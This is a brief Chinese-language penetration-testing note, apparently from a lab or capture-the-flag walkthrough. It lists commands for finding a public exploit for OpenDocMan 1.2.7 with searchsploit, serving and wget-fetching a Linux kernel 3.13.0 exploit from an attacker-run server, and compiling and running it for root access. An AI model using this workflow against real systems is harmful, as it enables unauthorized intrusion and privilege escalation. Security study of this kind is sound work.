参考博客传送门
关键点:web系统可能在msf中保留有漏洞记录,找到相对应的版本攻击点进行攻击
searchsploit OpenDocMan 1.2.7
一般存放目录都放在
/usr/share/exploitdb下面
获得低权限用户后 可以考虑Linux内核提权
searchsploit Linux 3.13.0
搭建一个文件服务器
python -m SimpleHTTPServer 6666
下载
wget http://xxx.xxx.xxx.xxx
如果是c类型文件,需要gcc编译
找到gcc
whereis gcc
gcc /usr/bin/gcc -o abc 37292.c
将编译后的文件保存再abc中
调高abc文件权限 chmod
./abc运行该payload 内核提权成功